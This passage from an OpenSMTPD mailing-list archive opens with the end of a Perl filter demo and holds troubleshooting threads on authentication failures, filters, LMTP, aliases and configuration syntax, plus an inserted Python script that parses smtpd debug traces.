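        $in_body{$sid} = 1;             # first empty line ends the headers
        $where = 'end of headers';
    }
    return ("filter-dataline|$token|$sid|$line", $where);
}

# Demo over the constructed lines below; a live filter would print the two
# register lines first and read STDIN instead of DATA.
while (my $raw = <DATA>) {
    my ($reply, $where) = handle($raw);
    next unless defined $reply;
    print STDERR "[$where]\n";
    print "$reply\n";
}

__DATA__
config|ready
filter|0|1566239933.836685|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|To: edgar
filter|0|1566239933.836688|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|
filter|0|1566239933.836692|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|a|b
filter|0|1566239933.836695|smtp-in|data-line|c0002b41f6bd164d|ef8747a12860387a|.
```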



Re: AUTH failures requires restarting smtpd

2019-08-10 Thread Edgar Pettijohn

On Aug 10, 2019 1:05 PM, Gilles Chehade  wrote:
>
> On Mon, Jul 22, 2019 at 11:52:45AM -0500, Edgar Pettijohn wrote:
> > 
> > On Jul 22, 2019 8:17 AM, Andreas Karlsson  wrote:
> > >
> > > On 2019-07-21 18:25, Edgar Pettijohn wrote:
> > > > Not sure exactly when this started, but I get authentication errors 
> > > > that require smtpd to be restarted. Here are some logs and other 
> > > > pertinent data.
> > > > 
> > > > Thanks,
> > > > 
> > > > Edgar
> > > > 
> > > Hi,
> > > Can you check if there are any issues with the connection to the MySQL 
> > > database during the time of the credentials lookup fails?
> > >
> > > I've had similar issues with Postgresql databases in the past (many 
> > > OpenSMTPD versions ago) where the psql tcp connection was disconnected 
> > > due to restarting the psql database. This was not handled well by 
> > > OpenSMTPD.
> > >
> > > br,
> > >
> > > -- 
> > > You received this mail because you are subscribed to misc@opensmtpd.org
> > > To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> > >
> > 
> > Maybe something similar. Mysqld is running and double checking the SQL from 
> > the command line works. Plus dovecot is using the same without error.
> > 
> > Thanks,
> > 
>
> Once I tag OpenSMTPD 6.6.0 in August, I'll have a look at extras because
> they've been out of my sight for a while.
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>


Thanks.  As an update I upgraded to a snapshot last week with no change. Have a 
cron job restarting smtpd every hour as a workaround.

Re: AUTH failures requires restarting smtpd

2019-07-22 Thread Edgar Pettijohn

On Jul 22, 2019 8:17 AM, Andreas Karlsson  wrote:
>
> On 2019-07-21 18:25, Edgar Pettijohn wrote:
> > Not sure exactly when this started, but I get authentication errors that 
> > require smtpd to be restarted. Here are some logs and other pertinent data.
> > 
> > Thanks,
> > 
> > Edgar
> > 
> Hi,
> Can you check if there are any issues with the connection to the MySQL 
> database during the time of the credentials lookup fails?
>
> I've had similar issues with Postgresql databases in the past (many 
> OpenSMTPD versions ago) where the psql tcp connection was disconnected 
> due to restarting the psql database. This was not handled well by OpenSMTPD.
>
> br,
>
>

I think it's good. Dovecot still works and I checked from the terminal and it 
worked. 

Thanks,

Edgar

AUTH failures requires restarting smtpd

2019-07-21 Thread Edgar Pettijohn
Not sure exactly when this started, but I get authentication errors that 
require smtpd to be restarted. Here are some logs and other pertinent data.

Thanks,

Edgar

#   $OpenBSD: smtpd.conf,v 1.9 2016/05/03 18:43:45 jung Exp $

# This is the smtpd server system-wide configuration file.
# See smtpd.conf(5) for more information.

pki mail.pettijohn-web.com cert "/etc/ssl/pettijohn-web.com.crt"
pki mail.pettijohn-web.com key "/etc/ssl/private/pettijohn-web.com.key"

table domains mysql:/etc/mail/mysql.conf
table virtuals mysql:/etc/mail/mysql.conf
table credentials mysql:/etc/mail/mysql.conf

filter f01 builtin ehlo fcrdns reject "550 go away punk"
filter f02 builtin helo fcrdns reject "550 go away punk"

filter c01 chain { f01, f02 }

listen on lo0
listen on egress port 25 tls pki mail.pettijohn-web.com filter c01
listen on egress port 587 tls pki mail.pettijohn-web.com auth 

action "act01" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
action "act02" relay

match auth from any for any action act02
match auth from any for domain  action act01
match from any for domain  action act01

Jul 20 19:50:19 mail smtpd[83239]: 624740cbf697f7b7 smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:50:20 mail smtpd[83239]: 624740cbf697f7b7 smtp message msgid=c417104e 
size=2221 nrcpt=1 proto=ESMTP
Jul 20 19:50:20 mail smtpd[83239]: 624740cbf697f7b7 smtp envelope 
evpid=c417104e559c49ed from= 
to=
Jul 20 19:50:20 mail dovecot: lmtp(83688): Connect from local
Jul 20 19:50:20 mail dovecot: 
lmtp(ed...@pettijohn-web.com)<83688>: 
msgid=<20190721002023.ga85...@deathstar.my.domain>: saved mail to INBOX
Jul 20 19:50:20 mail dovecot: lmtp(83688): Disconnect from local: Client has 
quit the connection (state=READY)
Jul 20 19:50:20 mail smtpd[83239]: 624740cce7483448 mda delivery 
evpid=c417104e559c49ed from= 
to= rcpt= user=vmail delay=0s 
result=Ok stat=Delivered
Jul 20 19:50:30 mail smtpd[83239]: 624740cbf697f7b7 smtp disconnected 
reason=quit
Jul 20 19:51:59 mail smtpd[83239]: 624740ce5f80c637 smtp connected 
address=185.234.216.144 host=
Jul 20 19:51:59 mail smtpd[83239]: 624740ce5f80c637 smtp failed-command 
command="EHLO User" result="550 go away punk"
Jul 20 19:52:00 mail smtpd[83239]: 624740ce5f80c637 smtp disconnected 
reason=quit
Jul 20 19:56:32 mail smtpd[83239]: 624740cf131a2d57 smtp connected 
address=73.203.197.238 host=c-73-203-197-238.hsd1.tn.comcast.net
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp authentication 
user=ed...@pettijohn-web.com result=ok
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp message msgid=2fd09838 
size=633 nrcpt=1 proto=ESMTP
Jul 20 19:56:33 mail smtpd[83239]: 624740cf131a2d57 smtp envelope 
evpid=2fd09838a28ee47a from= 
to=
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta connecting 
address=smtp://104.47.44.33:25 host=104.47.44.33
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta connected
Jul 20 19:56:33 mail smtpd[83239]: 624740d2ef323b04 mta tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-SHA384:256
Jul 20 19:56:33 mail smtpd[83239]: smtp-out: Server certificate verification 
succeeded on session 624740d2ef323b04
Jul 20 19:56:34 mail smtpd[83239]: 624740d2ef323b04 mta delivery 
evpid=2fd09838a28ee47a from= 
to= rcpt=<-> source="108.61.222.55" relay="104.47.44.33 
(104.47.44.33)" delay=1s result="Ok" stat="250 2.6.0 
 [InternalId=51861730154703, 
Hostname=SN1NAM04HT127.eop-NAM04.prod.protection.outlook.com] 7045 bytes in 
0.126, 54.586 KB/sec Queued mail for delivery -> 250 2.1.5"
Jul 20 19:56:43 mail smtpd[83239]: 624740cf131a2d57 smtp disconnected 
reason=quit
Jul 20 19:56:44 mail smtpd[83239]: 624740d2ef323b04 mta disconnected 
reason=quit messages=1
Jul 20 19:57:36 mail smtpd[83239]: 624740d3d9418c2d smtp connected 
address=73.203.197.238 host=c-73-203-197-238.hsd1.tn.comcast.net
Jul 20 19:57:36 mail smtpd[83239]: 624740d3d9418c2d smtp tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp authentication 
user=ed...@pettijohn-web.com result=ok
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp message msgid=ae4c49da 
size=633 nrcpt=1 proto=ESMTP
Jul 20 19:57:37 mail smtpd[83239]: 624740d3d9418c2d smtp envelope 
evpid=ae4c49da106f2b18 from= 
to=
Jul 20 19:57:37 mail smtpd[83239]: 624740d639a1318b mta connecting 
address=smtp://104.47.2.33:25 host=104.47.2.33
Jul 20 19:57:37 mail smtpd[83239]: 624740d639a1318b mta connected
Jul 20 19:57:38 mail smtpd[83239]: 624740d639a1318b mta tls 
ciphers=TLSv1.2:ECDHE-RSA-AES256-SHA384:256
Jul 20 19:57:38 mail smtpd[83239]: smtp-out: Server certificate verification 
succeeded on session 624740d639a1318b
Jul 20 19:57:39 mail smtpd[83239]: 624740d639a1318b mta delivery 
evpid=ae4c49da106f2b18 from= 
to= rcpt=<-> source="108.61.222.55" relay="104.47.2.33 
(104.47.2.33)" delay=2s result="Ok" stat="250 2.6.0 
 [InternalId=52871047466147, 

Re: filter feedback/help request

2019-07-05 Thread Edgar Pettijohn
Turned out to be a line buffering issue. The following works.

#!/usr/bin/perl

open(my $fh, '>', '/tmp/test.txt');

select(STDOUT);
$|++;
select($fh);
$|++;

print STDOUT "register|report|smtp-in|*\n";
print STDOUT "register|ready\n";

while ( my $line = <> ) {
print $fh "$line";
}

close $fh;

0;




Re: what's your LMTP use-case

2019-07-05 Thread Edgar Pettijohn

On Jul 5, 2019 9:57 AM, Gilles Chehade  wrote:
>
> helo,
>
> this is just a question out of curiosity
>
> I know plenty of people use the lmtp action to deliver mail through LMTP
> and I'm genuinely curious: what is your use-case ?
>
> Why do you deliver to LMTP ?
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>
>


I'm using dovecot for imap so might as well let it handle the delivery also. 
Not much of a reason but it's 
it.

filter feedback/help request

2019-07-04 Thread Edgar Pettijohn
I've been playing around with filters for a few hours, but I can't seem to get 
perl or lua scripts to work.

Here is a basic shell script that works.

#!/bin/sh

echo "register|report|smtp-in|*" 
echo "register|ready"

while read -r line;
do
echo "$line" >> /tmp/test.txt
done

However, the perl and lua equivalents do nothing. I don't see anything in the 
logs, but not sure if any filtering causes log entries to begin with. I suppose 
I could just use perl in my shell script, but overall it would be better for 
the perl to just work. I don't have much experience with lua, just wanted to 
test something else when I couldn't get perl working. I also tested the 
filter-eventlog and the filters Joerg posted. All of which worked in my very 
basic testing/experimenting. Thanks in advance for any help.

Edgar

#!/usr/bin/perl

open (my $fh, '>', '/tmp/test.txt') or die $!;

print "register|report|smtp-in|*\n";
print "register|ready\n";

while ( <> ) {
print $fh;
}

0;

#!/usr/local/bin/lua53

io.write("register|report|smtp-in|*\n")
io.write("register|ready\n")

out = io.open("/tmp/test.txt", "w")
io.output(out)

while true do
local line = io.read("*line")
if line == nil then break end
io.write(line)
end




Re: LMTP delivery broken in 6.5?

2019-05-23 Thread Edgar Pettijohn

On May 23, 2019 1:38 AM, mabi  wrote:
>
> Hello,
>
> I upgraded my OpenBSD 6.4 MX server running OpenSMTPD 6.4 to OpenBSD 6.5 
> running OpenSMTPD 6.5 but unfortunately had to revert back to 6.4 because 
> mail delivery to Dovecot using LMTP did not work anymore. Is it possible that 
> LMTP mail delivery is broken in OpenSMTPD 6.5?
>
> In my smtpd.conf file I use:
>
> action "lmtp_dovecot" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
>

Make sure dovecot is running and listening at that path. Netcat should help.

> The relevant error log entry of OpenSMTPD is:
>
> May 22 21:49:08 mx1 smtpd[45250]: dfc2d91c04922d88 mda delivery 
> evpid=7f51132de0fd58db from= to= 
> rcpt= user=vmail delay=1s result=PermFail stat=Error 
> ("mail.lmtp: LMTP server error: 451 4.4.0 Remote server not answering 
> (connect)")
>
> In the log file of Dovecot I don't see anything particular but just some 
> information about the connection:
>
> May 22 21:49:07 mx1 dovecot: lmtp(61415): Connect from local
> May 22 21:49:08 mx1 dovecot: lmtp(61415): Disconnect from local: Remote 
> closed connection (state=READY)
>
> I ran a tcpdump on port 24 (Dovecot LMTP port) and could see that the mail 
> delivery never goes past these two first commands:
>

You are delivering to a Unix socket not tcp.

> LHLO mx1.mydomain.tld
> XCLIENT HELO=localhost TTL=5
>
> In fact it seems to be trying in a loop to connect and always run LHLO and 
> XCLIENT but never goes further to actually issuing the mail.
>
> Running "ps auxwww | grep lmtp" shows me that mail.lmtp is running but never 
> manages to deliver the mail successfully:
>
> vmail    19798  0.0  0.1   248  1172 ??  I 10:03PM    0:00.00 
> /usr/libexec/mail.lmtp -f some...@domain.tld -d /var/dovecot/lmtp 
> m...@mydomain.tld
>
> Any ideas what could be going wrong here? or is it possibly a bug in 6.5?
>
> Best regards,
> Mabi
>
>
>

I haven't gotten around to upgrading yet, so I can't confirm if it's broken. 
However, I doubt it since there haven't been any other reports I've seen.

Edgar
>
>
>
>
>


Re: problem with resolution aliases after upgrade to 6.5

2019-05-05 Thread Edgar Pettijohn
Not sure if it's necessary, but it wouldn't hurt to try restarting smtpd and 
see if it works.
On May 5, 2019 4:59 PM, Sergey Bronnikov  wrote:
>
> Hello!
>
> I've found that smtpd behaves suspiciously with different values with
> the same key in aliases file.
>
> aliases(5) allows to append messages to file, so I added
> ay:    /etc/mail/messages
> to /etc/mail/aliases and update aliases db with newaliases(8).
> Mail sent to address ay@domain has been delivered and appended to
> /etc/mail/messages.
>
> expand: 0x6e46fce1018: expand_insert() called for
> address:a...@bronevichok.ru[parent=0x0, rule=0x0]
> expand: 0x6e46fce1018: inserted node 0x6e3e4edd000
> expand: lka_expand: address: a...@bronevichok.ru [depth=0]
> lookup: match "" as STRING in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> false
> lookup: match "209.85.167.42" as NETADDR in table static: -> true
> lookup: match "bronevichok.ru" as DOMAIN in table static:domains -> true
> rule #4 matched: match from any for domain domains => local
> expand: 0x6e46fce1018: expand_insert() called for
> username:ay[parent=0x6e3e4edd000, rule=0x6e466726c00, di
> spatcher=0x6e3a063db00]
> expand: 0x6e46fce1018: inserted node 0x6e47f71a800
> expand: lka_expand: username: ay [depth=1, sameuser=0]
> lookup: lookup "ay" as ALIAS in table db:aliases -> "/etc/mail/messages"
> expand: 0x6e483569280: expand_insert() called for
> filename:/etc/mail/messages[parent=0x0, rule=0x0]
> expand: 0x6e483569280: inserted node 0x6e3e4edd800
> expand: 0x6e46fce1018: expand_insert() called for
> filename:/etc/mail/messages[parent=0x6e47f71a800, rule=0x6e466726c00,
> dispatcher=0x6e3a063db00]
> expand: 0x6e46fce1018: inserted node 0x6e3e4edc000
> expand: 0x6e483569280: clearing expand tree
> expand: 0x6e483569280: freeing expand tree
> debug: aliases_get: returned 1 aliases
> expand: lka_expand: filename: /etc/mail/messages [depth=2]
>
>
> Let's replace file by valid email address:
> ay: este...@gmail.com
> and update aliases db with newaliases(8).
> Mail sent to address ay@domain has not been delivered with reason "550
> Invalid recipient: ".
>
> 523e4ad980, dispatcher=0x25248b3c440]
> expand: 0x25251721018: inserted node 0x25251724800
> expand: 0x252bdf33d40: clearing expand tree
>    expand: 0x252bdf33d40: freeing
> expand tree
> debug: aliases_get: returned 1 aliases
> expand: lka_expand: address: este...@gmail.com [depth=2]
> lookup: match "" as STRING in table static: -> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static: -> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static: -> true
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static:domains -> false
> lookup: match "local" as NETADDR in table static: -> true
> lookup: match "gmail.com" as DOMAIN in table static: -> true
> no rule matched
> mproc: lka -> pony : 35 IMSG_SMTP_EXPAND_RCPT
> expand: 0x25251721018: clearing expand tree
> imsg: pony <- lka: IMSG_SMTP_EXPAND_RCPT (len=35)
> smtp: 0x1ad082966000: >>> 550 Invalid recipient: 
> mproc: pony -> lka : 62 IMSG_??? (130)
> 54787b61ff698f5f smtp failed-command command="RCPT TO:" result="550 Invalid recipient: "
>
> Could anyone explain why it happens?
>
> Sergey
>
> Mon, 29 Apr 2019 at 23:15, Sergey Bronnikov :
> >
> > > Not sure if this is the only problem but domains is a table in this
> > > version so the line should be (missing <>):
> >
> > Good point, fixed it. But looks like there is more than one error in my 
> > config.
> > Still getting error "no such recipient".
> >
> > Sergey
> >
> > Mon, 29 Apr 2019 at 11:47, John Cox :
> > >
> > > Hi
> > >
> > > >Hello,
> > > >
> > > >I use aliases in an smtpd config and before upgrade to 6.5 it worked 
> > > >fine.
> > > >After upgrade and rewriting config smtpd starts to reject mails
> > > >addressed to aliases with a reason "550 Invalid recipient". What's
> > > >wrong with new config?
> > > >
> > > >/var/log/maillog:
> > > >
> > > >Apr 29 07:01:48 ns1 smtpd[71399]: e99e9db5916c8789 smtp connected address=209.85.167.44 host=mail-lf1-f44.google.com
> > > >Apr 29 07:01:48 ns1 smtpd[71399]: e99e9db5916c8789 smtp tls ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
> > > >Apr 29 07:01:49 ns1 smtpd[71399]: e99e9db5916c8789 smtp failed-command command="RCPT TO:" result="550 Invalid recipient: "
> > > >Apr 29 07:01:49 ns1 smtpd[71399]: e99e9db5916c8789 smtp disconnected reason=quit
> > > >
> > > >smtpd.conf before upgrade to 6.5:
> > > >
> > > >pki mx1. certificate "/etc/ssl/.crt"
> > > >pki mx1. key "/etc/ssl/private/.key"
> > > >
> > > >limit mta inet4
> > > >queue compression
> > > >
> > > 

Re: Relaying to 2 SMTP servers

2019-04-17 Thread Edgar Pettijohn
I think you need to provide more information about your exact requirements.
On Apr 17, 2019 7:51 AM, sel...@linagora.com wrote:
Hi,
I would like to know if it is possible to deliver a mail to 2 SMTP servers using OpenSMTPD.
Thanks for your help & Regards

--  Simon Elbaz @Linagora Mob: +33 (0) 6 38 99 18 34 Tour Franklin 100 Terrasse Boieldieu 92800 Puteaux  



Re: OpenSMTPD Extras

2019-03-23 Thread Edgar Pettijohn

On Mar 23, 2019 11:22 AM, This  wrote:
>
> I'm running opensmtpd 6.0.3p1-2 on Artix Linux. I'd like to get Extras for sqlite support, so I did everything according to instructions from here: https://github.com/OpenSMTPD/OpenSMTPD-extras
>
> After some turbulence I got the created path: /usr/libexec/opensmtpd/opensmtpd with some table-[stuff] executable files inside, including the table-sqlite file.
>
> However when I try to use the sqlite scheme in config, I get an error that says:
> smtpd: table_create: backend "sqlite" does not exist
>
> I copied the table-* files from
> /usr/libexec/opensmtpd/opensmtpd
> to
> /usr/libexec/opensmtpd
> but still no go.
>
> What am I missing? Documentation does not cover this.
Could you provide output from:
smtpd -dv

Re: 550 invalid recipient issue

2019-03-18 Thread Edgar Pettijohn

On Mar 18, 2019 9:53 PM, Gabriele Tofano  wrote:
>
>
> > On Mar 18, 2019, at 9:56 PM, Gabriele Tofano  
> > wrote:
> > 
> > 
> >> On Mar 18, 2019, at 8:06 PM, Thomas Bohl  
> >> wrote:
> >> 
> >>> The configuration loaded is correct as I see the daemon is loading the 
> >>> correct certificates and stuff if launched with smtpd -dv -T smtp. I am 
> >>> very shocked as I am not able to figure out what happened. I never 
> >>> changed any config file since December and I have installed this 
> >>> environment at least 3 times in my lab and was always working. I have 
> >>> forced the daemon to load my config file with -f and the issue persist.
> >> 
> >> At this point I would recreate /usr/local/etc/mail/domains and 
> >> /usr/local/etc/mail/virtuals. Rename the old files.
> >> Start by retyping (no clipboard) one line per file.
> >> 
> >> Reload them via
> >> # smtpctl update table domains
> >> # smtpctl update table virtuals
> >> 
> >> 
> >> You could also test a "catchall"
> >> @ user1
> >> 
> >> -- 
> >> You received this mail because you are subscribed to misc@opensmtpd.org
> >> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> >> 
> > 
> > I did what was suggested but it is still providing the message "550 Invalid 
> > recipient". I am very bummed since I do not understand what could have 
> > changed in terms of config files. They look the same as the originals that 
> > I use to set up new servers.
> > 
> > Is there any way to check what is loaded from the config file?
> > 
> > Thank you
> > 
>
> I discovered the below after running a smtpd -dv -Tlookup:
>
> lookup: check "17.58.63.178" as NETADDR in table static: -> 0
> lookup: check "17.58.63.178" as NETADDR in table static: -> found
> lookup: check "domain.com" as DOMAIN in table static: -> found
> lookup: lookup "user1" as USERINFO in table getpwnam: -> 0
>
> Why is osmtpd looking for user1 in table getpwnam? What table is that?

I think it is /etc/passwd 


> --
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>
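The lookup and expand traces quoted in the "550 Invalid recipient" threads above can be read mechanically. This is an added example, not code from the list or from OpenSMTPD: it groups lookup results under the expansion node they belong to and reports the node that ended without a rule. The sample traces and all addresses are constructed, and the function names are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed traces modelled on the debug output quoted in this thread.
# Addresses, domains and table names are placeholders.
NEW_STYLE = """\
> expand: lka_expand: address: ay@example.org [depth=0]
> lookup: match "203.0.113.7" as NETADDR in table static:<anyhost> -> true
> lookup: match "example.org" as DOMAIN in table static:domains -> true
> rule #4 matched: match from any for domain domains => local
> expand: lka_expand: username: ay [depth=1, sameuser=0]
> lookup: lookup "ay" as ALIAS in table db:aliases -> "someone@example.net"
> expand: lka_expand: address: someone@example.net [depth=2]
> lookup: match "local" as NETADDR in table static:<localhost> -> true
> lookup: match "example.net" as DOMAIN in table static:domains -> false
> no rule matched
> smtp: 0x1ad082966000: >>> 550 Invalid recipient: <ay@example.org>
"""
# Older line shape ("check", "found", "0"), as in the second thread.
OLD_STYLE = """\
lookup: check "192.0.2.10" as NETADDR in table static: -> found
lookup: check "example.com" as DOMAIN in table static: -> found
lookup: lookup "user1" as USERINFO in table getpwnam: -> 0
"""

QUOTE = re.compile(r"^(?:>\s?)+")  # mail quoting in front of a pasted trace
LOOKUP = re.compile(
    r'lookup: (match|check|lookup) "([^"]*)" as (\w+) in table (\S*) -> (.+)$')
EXPAND = re.compile(
    r"expand: lka_expand: (address|username|filename): (.+?) \[depth=(\d+)")
RULE = re.compile(r"rule #(\d+) matched: (.+)$")
REPLY = re.compile(r">>> (\d{3}) (.*)$")


@dataclass
class Lookup:
    key: str
    kind: str
    table: str
    hit: bool


@dataclass
class Node:
    kind: str            # address, username, filename, or "session"
    value: str
    depth: int
    lookups: List[Lookup] = field(default_factory=list)
    rule: Optional[str] = None   # text of the matched rule, if any
    decided: bool = False        # True once a rule verdict line was seen


def analyse(trace):
    """Return (nodes, replies): lookups grouped per expansion node, and
    the SMTP replies (code, text) seen in the trace."""
    nodes, replies, cur = [], [], None
    for raw in trace.splitlines():
        line = QUOTE.sub("", raw).strip()
        if (m := EXPAND.search(line)):
            cur = Node(m[1], m[2], int(m[3]))
            nodes.append(cur)
        elif (m := LOOKUP.search(line)):
            if cur is None:  # trace without expand lines
                cur = Node("session", "-", 0)
                nodes.append(cur)
            res = m[5].strip()
            hit = res in ("true", "found") or res.startswith('"')
            cur.lookups.append(Lookup(m[2], m[3], m[4].rstrip(":"), hit))
        elif (m := RULE.search(line)) and cur:
            cur.rule, cur.decided = f"#{m[1]} {m[2]}", True
        elif line == "no rule matched" and cur:
            cur.decided = True
        elif (m := REPLY.search(line)):
            replies.append((m[1], m[2]))
    return nodes, replies


def findings(trace):
    """One line per node that ended with no rule, plus every USERINFO or
    ALIAS lookup that returned nothing."""
    nodes, _ = analyse(trace)
    out = []
    for n in nodes:
        misses = [l for l in n.lookups if not l.hit]
        if n.decided and n.rule is None:
            why = ", ".join(f'{l.kind} "{l.key}" not in {l.table}'
                            for l in misses) or "no failed lookup logged"
            out.append(f"{n.kind} {n.value} (depth {n.depth}): "
                       f"no rule matched; {why}")
        for l in misses:
            if l.kind in ("USERINFO", "ALIAS"):
                out.append(f'{l.kind} "{l.key}" not found in table {l.table}')
    return out


if __name__ == "__main__":
    for text in findings(NEW_STYLE) + findings(OLD_STYLE):
        print(text)
```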

Re: 550 invalid recipient issue

2019-03-16 Thread Edgar Pettijohn

On Mar 16, 2019 5:09 PM, Thomas Bohl  wrote:
>
> > Both files are looking good/same as before and local delivery with sendmail 
> > does not work:
> > 
> > ga...@server.com... Connecting to [127.0.0.1] via relay...
> > 220 mail.server.com ESMTP OpenSMTPD
>  EHLO mail.server.com
> > 250-mail.server.com Hello mail.server.com [127.0.0.1], pleased to meet you
> > 250-8BITMIME
> > 250-ENHANCEDSTATUSCODES
> > 250-SIZE 36700160
> > 250-DSN
> > 250 HELP
>  MAIL From: SIZE=108
> > 250 2.0.0: Ok
>  RCPT To:
> > 550 Invalid recipient
>
> Hm... You said it stopped working after you restarted smtpd.
> Maybe it runs off a wrong config file?
>
> I once accidentally typed "smtpd" in the middle of changing the 
> configuration. Which started a daemonized smtpd with an unfinished 
> config. No matter how often I changed the smtpd.conf and typed "rcctl 
> restart smtpd" the wrong config persisted :-) It took me about two hours 
> until I realised smtpd was still running after "rcctl stop smtpd".
>
> -- 

You aren't alone. I've done the same.



Re: OpenSMTPD with PAM

2019-03-11 Thread Edgar Pettijohn

On Mar 11, 2019 4:43 PM, Bryan Harris  wrote:
>
> When I install it on RHEL 7 I get this file, so maybe it works already.
>
> [root@bi2 ~]# cat /etc/pam.d/smtp.opensmtpd
> #%PAM-1.0
> auth   include    password-auth
> account    include    password-auth
>
> I guess dovecot and PAM is a separate issue.
>
> V/r,
> Bryan
>

I'm not a PAM expert, but I suspect that it would work for dovecot also, just 
the file name would be different.


> On 3/11/2019 5:29 PM, This wrote:
> > Hi there.
> >
> > For two years I've been trying to set up postfix when I finally gave 
> > up on it. Then I found OpenSMTPD and I set it up in two days. This 
> > message is the result of it.
> >
> > I learned that OpenSMTPD supports PAM, however I cannot reach any info 
> > on how is this achieved. Can somebody point me to the right sources or 
> > provide a how-to?
> >
> > Ideally I'd like to get to a point where I have a single passwd file 
> > shared with dovecot.
> >
> >
>


Re: Upgrade from OpenBSD 6.2-stable to 6.4-stable, new syntax .. mlmmj anyone?

2019-02-05 Thread Edgar Pettijohn

On Feb 5, 2019 5:57 AM, Tor Houghton  wrote:
>
> Hello,
>
> In 6.2 smtpd.conf, I had the following syntax for delivery to mlmmj:
>
> accept from any for domain  virtual  \
>   deliver to mda "/usr/local/bin/mlmmj-recieve -L 
> /var/spool/mlmmj/%{rcpt.user:lowercase|strip}/"
>

Try:

action "mlmmj" mda "/usr/local/bin/mlmmj-recieve -L /var/spool/mlmmj/%{rcpt.user:lowercase|strip}/" virtual 

match from any for domain  action "mlmmj"


> I understand I now need to split this into an "action" and a "match" line, 
> but I'm having issues .. 
>
> All help appreciated!
>
> Kind regards,
>
> Tor
>
>


Re: Support of plus character in email address

2019-01-02 Thread Edgar Pettijohn

On Jan 2, 2019 9:43 AM, mabi  wrote:
>
> ‐‐‐ Original Message ‐‐‐
> On Wednesday, January 2, 2019 3:16 PM, Edgar Pettijohn 
>  wrote:
>
> > I recently switched to dspam. It ties into smtpd very similarly to amavis. 
> > Plus it doesn't appear to need the additional  table, and 
> > delimiters still work out of the box. Everything you need to know is 
> > included in the README plus the specific readme for postgres backend.
>
> I heard good things too about dspam, call me crazy maybe but for me Amavis in 
> combination with ClamAV and SpamAssassin has been doing a great job.
>
> > I'm pretty sure that's why I stopped using amavis originally. It is very 
> > easy to cause problems.
>
> I just would like to precise here that it is not Amavis the source of the 
> "problem" in my specific case here but the fact that using an rcpt-to with a 
> recipients table in a match rule does not take into account e-mail addresses 
> containing a plus character. In my opinion it should allow e-mail addresses 
> with a plus or at least it should be a boolean parameter which one can turn 
> on/off in smtpd.conf.
>
> @Gilles maybe you have any comments about that?

https://www.postgresql.org/docs/9.3/functions-matching.html

You will likely need to use some of the regex functions to pull out the user 
and domain from 
$1.

Re: Support of plus character in email address

2019-01-02 Thread Edgar Pettijohn

On Jan 2, 2019 7:41 AM, mabi  wrote:
>
> ‐‐‐ Original Message ‐‐‐
> On Wednesday, January 2, 2019 1:53 PM, Oscar Carlsson  
> wrote:
>
> > As far as I know sub-addressing is enabled by default. I haven't found
> > anything in my configuration that explicitly enables it, but it works
> > out of the box here.
>
> That's also what I thought by checking the smtpd.conf man page but I presume 
> my issue here is that I use a recipients table in order to check if an e-mail 
> address is valid or not before sending to Amavis and then Dovecot. The 
> relevant part of my smtpd.conf file looks like this:
>
> table recipients postgres:/etc/mail/postgresql.conf
> match from any for domain  rcpt-to  action "relay_amavis"
>
> So here I presume that the rcpt-to option of match does not support having a 
> "+" in the e-mail address.
>
> A workaround would be having to manually define the valid "+" recipients in 
> my recipients table but that really sounds stupid and is not very useful...
>

I recently switched to dspam. It ties into smtpd very similarly to amavis. Plus 
it doesn't appear to need the additional  table, and delimiters 
still work out of the box. Everything you need to know is included in the 
README plus the specific readme for postgres backend. 

Might be worth a look. Plus it doesn't seem to be such a memory hog as the perl 
alternatives.

I'm pretty sure that's why I stopped using amavis originally. It is very easy 
to cause problems.

Edgar


Re: Thoughts and queries (n=1) on the filter API

2018-12-23 Thread Edgar Pettijohn

On Dec 23, 2018 5:27 AM, Gilles Chehade  wrote:
>
> On Sun, Dec 23, 2018 at 12:06:02PM +0100, Aham Brahmasmi wrote:
> > Bonjour Monsieur Gilles,
> > 
> > Merci beaucoup for your exhaustive explanations.
> > 
> > > > 1) What is the difference between the "report" and "filter" prefixes?
> > > > My current understanding is that "report" is oriented towards reporting
> > > > and "filter" is oriented towards writing filters.
> > > >
> > > 
> > > very simple:
> > > 
> > > - event reporting lets smtpd notify filters of any event that leads to
> > >   a change in the SMTP session, they are informative and do not accept
> > >   any answer.
> > > 
> > > - event filtering lets smtpd notify filters of any event that leads to
> > >   a decision in the SMTP session, they are decisive and require that a
> > >   filter provides a decision.
> > > 
> > > report lines are one way from smtpd to filters, filters must not reply
> > > 
> > > filter lines are two way between smtpd and filters, for any request an
> > > answer is required.
> > > 
> > > both reporting and filtering are "subscribed" so filters will only get
> > > the events they subscribed to.
> > 
